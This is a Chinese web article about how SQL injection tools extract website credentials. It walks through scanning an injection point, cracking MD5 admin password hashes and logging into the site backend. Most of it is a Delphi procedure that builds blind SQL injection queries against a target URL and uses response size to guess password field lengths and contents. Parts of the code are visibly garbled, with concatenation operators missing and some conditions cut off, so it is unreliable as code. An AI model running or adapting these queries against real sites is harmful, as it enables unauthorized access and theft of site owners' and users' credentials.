上图只是对一个网站注入点的工具检测,当然看到了结果扫出来的密码为16位的md5加密码,但我们可以通过md5密码破解工具进行破解的。然后找到后台用所得的用户名和密码进行登录即可。对于黑客软件,其实并不是我们想象的那么复杂,只是根据掌握的漏洞信息提交相应该的数据罢了,我们看下下面一段用delphi写的注入的片段就清楚不过了。这里控件的设置和线程的创建略,我们主要是看看猜解的过程,如下: procedure TMainForm.GuessContProc(ListInt: integer); { SQL注入 - 多线程猜解字段内容 } function SQLTextFunc(URl, TopStr, TableName, FieldName, LevelStr: string; Len: integer): string; begin Result := Url ’ and exists(select * from ’ TableName ’ where len(’ FieldName ’)’ LevelStr IntToStr(Len) ’ and id=(Select max(id) From ’ TableName ’ where id in (select top ’ TOPStr ’ id from ’ TableName ’ Order by id)))’ end; var TableName: string; FieldName, S: string; ContentInt: integer; i, Len, LengthInt, N: integer; GridCount: integer; Colu: TColumn; FlagBool: boolean; begin Len := 0; LengthInt := 0; FlagBool := True; TableName := TableNameLst.Items[TableNameLst.Itemindex]; FieldName := Memo2.Lines[ListInt]; if (LowerCase(FieldName) = ’password’) or (LowerCase(FieldName) = ’pass’) or (LowerCase(FieldName) = ’admin_pass’) or (FieldName = ’密码’) or (LowerCase(FieldName) = ’userpassword’) or (LowerCase(FieldName) = ’passwd’) then begin ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, 16), 800); if ContentInt >= and1Num then begin SqlResultMemo.Lines.Add(FieldName ’长度: 16’); LengthInt := 16 end else begin while (Len begin application.ProcessMessages; inc(Len, 2); Pane1.Caption := ’正在检测长度:Len(’ FieldName ’)=’ inttostr(Len); ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’ if ContentInt >= and1Num then begin for N := Len - 1 to Len do begin ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, N), 800); if ContentInt >= and1Num then begin LengthInt := N; SqlResultMemo.Lines.Add(FieldName ’长度: ’ inttostr(N)); FlagBool := False; Break; end; // if end; // for end; // if end; // while end; end else begin while (Len begin application.ProcessMessages; inc(Len, 2); Pane1.Caption := ’正在检测长度:Len(’ FieldName ’)=’ inttostr(Len); ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’ if ContentInt >= and1Num then begin for N := Len - 1 to Len do begin ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, N), 800); if ContentInt >= and1Num then begin LengthInt := N; SqlResultMemo.Lines.Add(FieldName ’长度: ’ inttostr(N)); FlagBool := False; Break; end; // if end; // for end; // if end; // while end; GuessLsv.Clear; if Len >= 50 then begin sql_EdUrl.Enabled := True; Sql_GuessTable.Enabled := True; TableNameLst.Enabled := True; FieldNameLst.Enabled := True; application.MessageBox(’列名长度大于50,猜解失败!’, ’提示’, 32); Exit; end; Pane1.Caption := ’正在检测’ FieldName ’的内容...’; GuessLsv.Update; if LengthInt = 5 then begin ContentInt := Get_HttpSize(Sql_EdUrl.Text ’ and exists (select top ’ sqlEdTop.Text ’ ’ FieldName ’ from ’ TableName ’ where instr(’ FieldName ’,’’admin’’)=1 and len(username)=5)’); if ContentInt >= and1Num then begin s := ’admin’; for i := 1 to 5 do begin application.ProcessMessages; with GuessLsv.Items.Add do begin caption := ’第’ inttostr(i) ’位’; SubItems.Add(s); end; sleep(60); GuessLsv.Update; end; inc(SQL_ScanContent_ThreadCreateCount); StringGrid1.Cells[SQL_ScanContent_ThreadCreateCount - 1, 1] := ’admin’; StringGrid1.Cells[SQL_ScanContent_ThreadCreateCount, 1] := ’检测中...’; SqlResultMemo.Lines.Add(FieldNameLst.Items[FieldNameLst.Itemindex] ’内容:admin’); if SQL_ScanContent_ThreadCreateCount GuessContProc(SQL_ScanContent_ThreadCreateCount - 1); Exit; end else begin for i := 1 to LengthInt do begin application.ProcessMessages; with GuessLsv.Items.Add do begin caption := ’第’ inttostr(i) ’位’; SubItems.Add(’检测中’); end; sleep(30); end; end; end else begin for i := 1 to LengthInt do begin application.ProcessMessages; with GuessLsv.Items.Add do begin caption := ’第’ inttostr(i) ’位’; SubItems.Add(’检测中’); end; sleep(30); end; end; 从上面的代码中,我们可以看出,黑客软件只是代替了手工操作,通过多线程更进一步提高了猜解的速度,但猜解的表和字段还得我们自己设定,然后通过post提交我们设定的格式(其中url中的 是空格的意思,因为在网址后面执行相应的sql语句时都要有相应的空格),按照我们设定的表和字段猜解出相应的用户名和密码内容。 |
免责声明:本站部分文章和图片均来自用户投稿和网络收集,旨在传播知识,文章和图片版权归原作者及原出处所有,仅供学习与参考,请勿用于商业用途,如果损害了您的权利,请联系我们及时修正或删除。谢谢!
始终以前瞻性的眼光聚焦站长、创业、互联网等领域,为您提供最新最全的互联网资讯,帮助站长转型升级,为互联网创业者提供更加优质的创业信息和品牌营销服务,与站长一起进步!让互联网创业者不再孤独!
扫一扫,关注站长网微信